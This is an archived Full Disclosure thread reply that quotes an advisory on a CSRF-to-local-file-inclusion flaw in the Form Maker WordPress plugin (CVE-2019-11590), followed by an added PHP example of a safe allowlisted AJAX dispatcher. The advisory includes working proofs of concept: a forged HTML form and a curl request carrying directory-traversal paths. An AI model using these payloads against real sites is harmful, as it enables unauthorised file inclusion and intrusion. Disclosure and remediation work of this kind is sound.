Re: WordPress Plugin Form Maker by WD [CSRF → LFI]

Related Vulnerabilities: CVE-2019-11590  
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a> mailing list archives</h2>
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</h1>
<hr>
<em>From</em>: Henri Salo &lt;henri () nerv fi&gt;
<em>Date</em>: Mon, 29 Apr 2019 18:07:27 +0300
<hr>
<pre style="margin: 0em;">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

On Fri, Apr 05, 2019 at 02:01:21PM +0300, Panagiotis Vagenas wrote:
</pre><blockquote style="border-left: #5555EE solid 0.2em; margin: 0em; padding-left: 0.85em"><pre style="margin: 0em;"># Exploit Title: Form Maker by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: <a rel="nofollow" href="http://web-dorado.com/">http://web-dorado.com/</a>
# Software Link: <a rel="nofollow" href="https://wordpress.org/plugins/form-maker">https://wordpress.org/plugins/form-maker</a>
# Version: 1.13.2
# Tested on: WordPress 5.1

Description
-----------

The plugin implements the following AJAX actions:

- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage_fm`
- `FMShortocde`

All of them call the function `form_maker_ajax`. This function
dynamically loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action, a user could define the plugin action
in `$_GET['action']` and the AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal, thus leading to a Local File Inclusion
vulnerability.

The plugin also registers the following AJAX actions:

- `paypal_info`
- `checkpaypal`

Those seem like they are only available to PRO version users, yet they
are also vulnerable to this attack.

Additionally, the following AJAX actions are registered in the PRO version:

- `get_frontend_stats`
- `frontend_show_map`
- `frontend_show_matrix`
- `frontend_paypal_info`
- `frontend_generate_csv`
- `frontend_generate_xml`

Those have the function `form_maker_ajax_frontend` as a callback. All of
them are vulnerable to the aforementioned attack. What's more
interesting about those is the fact that they are available to
non-registered users also, making this attack directly exploitable
without using a CSRF attack. In this case the vulnerable param is
`$_REQUEST['page']`.

PoC
---

### Using a CSRF attack

```html
&lt;form method="post"
      action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index"&gt;
    &lt;label&gt;AJAX action:
        &lt;select name="action"&gt;
            &lt;optgroup label="Free version"&gt;
                &lt;option value="generete_csv"&gt;generete_csv&lt;/option&gt;
                &lt;option value="generete_xml"&gt;generete_xml&lt;/option&gt;
                &lt;option value="formmakerwdcaptcha"&gt;formmakerwdcaptcha&lt;/option&gt;
                &lt;option value="formmakerwdmathcaptcha"&gt;formmakerwdmathcaptcha&lt;/option&gt;
                &lt;option value="product_option"&gt;product_option&lt;/option&gt;
                &lt;option value="FormMakerEditCountryinPopup"&gt;FormMakerEditCountryinPopup&lt;/option&gt;
                &lt;option value="FormMakerMapEditinPopup"&gt;FormMakerMapEditinPopup&lt;/option&gt;
                &lt;option value="FormMakerIpinfoinPopup"&gt;FormMakerIpinfoinPopup&lt;/option&gt;
                &lt;option value="show_matrix"&gt;show_matrix&lt;/option&gt;
                &lt;option value="FormMakerSubmits"&gt;FormMakerSubmits&lt;/option&gt;
                &lt;option value="FormMakerSQLMapping"&gt;FormMakerSQLMapping&lt;/option&gt;
                &lt;option value="select_data_from_db"&gt;select_data_from_db&lt;/option&gt;
                &lt;option value="manage_fm"&gt;manage_fm&lt;/option&gt;
                &lt;option value="FMShortocde"&gt;FMShortocde&lt;/option&gt;
            &lt;/optgroup&gt;
            &lt;optgroup label="Pro Version"&gt;
                &lt;option value="paypal_info"&gt;paypal_info&lt;/option&gt;
                &lt;option value="checkpaypal"&gt;checkpaypal&lt;/option&gt;
                &lt;option value="get_frontend_stats"&gt;get_frontend_stats&lt;/option&gt;
                &lt;option value="frontend_show_map"&gt;frontend_show_map&lt;/option&gt;
                &lt;option value="frontend_show_matrix"&gt;frontend_show_matrix&lt;/option&gt;
                &lt;option value="frontend_paypal_info"&gt;frontend_paypal_info&lt;/option&gt;
                &lt;option value="frontend_generate_csv"&gt;frontend_generate_csv&lt;/option&gt;
                &lt;option value="frontend_generate_xml"&gt;frontend_generate_xml&lt;/option&gt;
            &lt;/optgroup&gt;
        &lt;/select&gt;
    &lt;/label&gt;
    &lt;button type="submit" value="Submit"&gt;Submit&lt;/button&gt;
&lt;/form&gt;
```

### Without leveraging the CSRF vulnerability

```sh
curl 'http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php' \
    -d 'action=get_frontend_stats&amp;page=/../../../../../index'
```
</pre></blockquote><pre style="margin: 0em;">
MITRE assigned CVE-2019-11590 for this issue.

-- 
Henri Salo

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
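<p>The root cause described in the quoted advisory is that the plugin's AJAX callback builds an include path from a request parameter (<code>$_GET['action']</code>, <code>$_POST['action']</code> or <code>$_REQUEST['page']</code>) that WordPress itself never validated, while WordPress picks the hook to fire from a different copy of the same parameter. The following is an added example, not Form Maker's code and not a patch from the vendor: a dispatcher in which the hook that WordPress fires decides the handler file through a fixed allowlist, so no request parameter ever reaches an include, and the logged-in actions additionally require a nonce and a capability. Every name in it (the <code>fm_</code> prefix, the <code>fm_ajax_nonce</code> action, the handler file names) is hypothetical; the action names are a subset of those listed in the advisory.</p>

```php
<?php
/**
 * Added example (hypothetical plugin code, not Form Maker's): allowlisted
 * AJAX dispatch for a WordPress plugin. The hook name that WordPress fires
 * selects the handler file; $_GET/$_POST/$_REQUEST never touch the path.
 */

// Action name => handler file, relative to this plugin's directory.
// Logged-in (wp_ajax_) actions: also need a nonce and a capability check.
const FM_ADMIN_ACTIONS = [
    'generete_csv' => 'admin/generate_csv.php',
    'generete_xml' => 'admin/generate_xml.php',
    'manage_fm'    => 'admin/manage_fm.php',
];

// Anonymous (wp_ajax_nopriv_) actions: reachable by any visitor, so only
// read-only handlers belong here, and the file is still fixed per action.
const FM_PUBLIC_ACTIONS = [
    'frontend_show_map' => 'frontend/show_map.php',
];

/**
 * Include one allowlisted handler. realpath() plus a prefix check is
 * defence in depth: even a mistaken allowlist entry cannot resolve to a
 * file outside the plugin directory.
 */
function fm_include_handler(string $relative): void {
    $base = realpath(plugin_dir_path(__FILE__));
    $file = realpath($base . '/' . $relative);
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        wp_send_json_error('handler not found', 404); // sends JSON and exits
    }
    require $file;
}

function fm_register_ajax(): void {
    foreach (FM_ADMIN_ACTIONS as $action => $file) {
        add_action("wp_ajax_{$action}", function () use ($file) {
            // CSRF: dies with -1 unless a valid 'nonce' field was posted.
            check_ajax_referer('fm_ajax_nonce', 'nonce');
            // Authorisation: being logged in is not enough for admin handlers.
            if (!current_user_can('manage_options')) {
                wp_send_json_error('forbidden', 403);
            }
            fm_include_handler($file);
        });
    }
    foreach (FM_PUBLIC_ACTIONS as $action => $file) {
        $callback = function () use ($file) {
            fm_include_handler($file);
        };
        add_action("wp_ajax_{$action}", $callback);
        add_action("wp_ajax_nopriv_{$action}", $callback);
    }
}
add_action('init', 'fm_register_ajax');
```

<p>The client side of the logged-in actions sends a <code>nonce</code> field created with <code>wp_create_nonce('fm_ajax_nonce')</code> (typically handed to the page's script via <code>wp_localize_script</code>); a form on a third-party site, like the one in the PoC, cannot obtain that value, so the request dies at <code>check_ajax_referer</code> before any file is considered. A request whose <code>action</code> is a traversal string matches no registered <code>wp_ajax_*</code> hook at all and falls through to WordPress's own unknown-action handling, and the <code>page</code> parameter used by the frontend handlers is simply never read by the dispatcher.</p>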
<hr>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><a name="10" href="10">WordPress Plugin Form Maker by WD [CSRF → LFI]</a> <em>Panagiotis Vagenas (Apr 05)</em>
<ul>
<li><strong>Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</strong> <em>Henri Salo (Apr 30)</em>
</li>
</ul>
</li>
</ul>